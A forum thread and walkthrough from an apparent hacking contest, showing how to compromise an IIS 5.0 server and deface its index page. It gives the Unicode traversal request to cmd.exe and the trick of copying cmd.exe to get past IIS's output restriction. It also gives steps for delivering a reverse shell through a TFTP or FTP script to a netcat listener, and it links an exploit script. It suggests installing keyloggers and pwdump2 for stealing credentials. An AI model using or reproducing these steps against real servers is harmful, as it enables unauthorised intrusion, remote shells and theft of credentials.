Security practice (contest)

the webserver is down or has crashed

Well i got my name on the webpage

I can do, but not yet, we'll see who else gets in.. I hope they append to index.htm and not overwrite it

I hoped to be able to get a "nicer" method of access to the server, although this is possible by installing external software remotely, i dont think it is needed or wanted here.

i was going by a false positive reading from a scan yesterday which proved infact to not be vulnerable so I used a different attack today which seemed better

hehe people please use >> and not > now! :-)
If you dont understand that, you wont be need'in it

my friend reports its down now

yeah i think trying to execute shellcode via the weakness is crashing instead of doing what its supposed to do

incase someone overwrites the index.htm file:

It was good fun, but you gotta be quick!

I'll type out some stuff, I'll pm it to ya, you can read over it and make any modifications as necessary...

I used Linux for this but Windows should be fine also.. (the server was down while I was typing this so typo's or mistakes might exist below)

You can use either
Web Browser or
Telnet or
Perl or other ways, you can use your imagination.


Ok, we are given an ip address of: 86.41.138.247.

First thing I do is check for basic services like webserver/ftp/ssh/telnet on 86.41.138.247... but nothing.

To see what services are been offered by this ip, I used a security scanner called Nessus. There are many scanners that do the same job like X-Scan, Retina Network scanner, Nmap and many more, but Nessus is my choice.

Do a quick scan of 86.41.138.247 with Nessus (Use google if you don't know how to use Nessus).

Nessus will report that there is a web-server listening on port 8080, IIS 5.0. It will also report a number of holes/vulnerabilities on this specific IIS.
One of these vulnerabilities been the IIS Unicode Vulnerability.

Once you have identified a weakness, you can launch an attack/exploit against it.
Quick google search for IIS 5.0 exploits gives many results :-)

I went with the IIS Unicode bug...
You can google this if you want an explanation as to what this is and why this attack works on IIS.

In your browser go to the following url:



This should give you a director listing of the C:\ drive.
Note the WEB_ROOT folder.

NOTE: If this url gives trouble in your browser, do this instead:
telnet 86.41.138.247 8080
(in here type:)
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0
(hit return twice)


The idea of this contest is to get your name on the webserver, preferably the main page (index.???)

Lets list the contents of WEB_ROOT:


Ah index.htm :-D

Now we need to add our name onto that: ( > for create/write, >> for append/write )


Wtf? Incorrect parameter or some crap returned, even if you use the telnet method above, and if you url encode the url above, eg. >> to %3E%3E
This took me a while to get past, after alot of google searching, it seems IIS has a input/output restriction on cmd.exe.

How do we get past that? simple...
copy cmd.exe to a different location with a different name and use that.. thats all!


Note newcmd.exe will be in the current dir which is:
c:\inetpub\scripts\

Now execute:



Again if your browser gives trouble, try encoding the non friendly url chars or use the telnet method above.. or....
For the lazy, here is a perl script which will do this for you automatically:
http://www.milw0rm.com/exploits/192

Now if you browse to http://86.41.138.247:8080 you should see your name.

To make things really fancy, compile a win32 reverse shell src like: (obviously putting in your port and ip in the src)
http://archive.cert.uni-stuttgart.de/vuln-dev/2003/02/msg00015.html

Host it on your TFTP server (bit easier than FTP-server),
There is many stand-alone executable TFTP servers for Windows, and if your on Linux chances are you already got one, you just need to set it up.

Now make the victim server download your reverse shell:


This will pull the file across to the victim via TFTP server.

If its on FTP, its bit harder, you need to execute these commands (using the url like before, which I haven't typed here)
echo open 111.222.333.444 > ftp.txt
echo open loginname >> ftp.txt
echo open mypassword >> ftp.txt
echo get yourshell.exe >> ftp.txt
echo bye >> ftp.txt
ftp -i -s:ftp.txt

This will pull the file across to the victim via FTP server.

On your own pc/server start a netcat session for what ever port you compiled with your shell src (make sure you forward this port through your router/gateway and have it open in firewall allowing access to your pc with netcat session):
nc -l -p xxxx

Execute the reverse shell on the victim:


If all goes will, you should have shell access to the victim server in your netcat session.


Of course this is just an idea. Many other undesirable executables could be transfered across, like vnc, serv-u (this has exec support), keylogger, spyware, adware, scumware, pwdump2 (grab login credentials and break them using online LM rainbow tables in seconds)


Just a side note here: As this was a webserver specific weakness, it would have been found using specific webserver scanners such as Nikto (Wikto - windows port). I recommend you look at these tools.


damohere at gmail . com